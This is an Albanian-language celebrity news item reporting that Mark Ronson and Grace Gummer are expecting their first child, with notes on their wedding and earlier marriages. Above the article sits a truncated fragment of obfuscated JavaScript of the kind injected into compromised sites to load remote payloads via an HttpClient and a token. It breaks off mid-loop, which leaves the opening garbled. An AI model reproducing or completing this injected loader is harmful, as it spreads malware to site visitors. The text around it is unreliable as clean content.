;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktorja e njohur po bëhet nënë për herë të parë

By

Producenti fitues i Grammy-t, Mark Ronson dhe gruaja e tij, aktorja amerikane Grace Gummer, janë në pritje të fëmijës së tyre të parë, konfirmojnë burimet për Page Six.

Gummer tregoi barkun e saj në festën e 50-vjetorit të W Magazine në NYC të martën, ndërsa kishte veshur koleksionin Michael Kors.

Dyshja – të cilët festuan përvjetorin e tyre të parë të martesës në gusht – thuhet se janë të emocionuar.

Një burim në dijeni tha se Ronson gjithmonë ka dashur të bëhet baba.

View this post on Instagram

A post shared by Mark Ronson (@iammarkronson)

Ronson u korurëzua me aktoren 36-vjeçare në një ceremoni intime të vendit.
Ai njoftoi se ishin martuar në ditëlindjen e tij shtatorin e kaluar, ku ai shprehu dashurinë e tij për nusen e tij të re.

“Dhe jam i sigurt që m’u deshën 45 vjet për t’u bërë njeriu i denjë për dashurinë tuaj. Shpresoj që të kaloj çdo ditëlindje pranë jush deri në ditën time të fundit”.

Gummer është vajza e fitueses së çmimit Oscar Streep dhe bashkëshortit të saj, skulptorit Don Gummer.

Ronson ishte i martuar me aktoren franceze Joséphine de La Baume nga 2011 deri në 2018, dhe Gummer ishte e martuar me muzikantin Tay Strathairn, djalin e aktorit David Strathairn – bashkë-ylli i Streep “The River Wild” dhe “Silkwood” – për rreth një muaj.

Artikuj të ngjashëm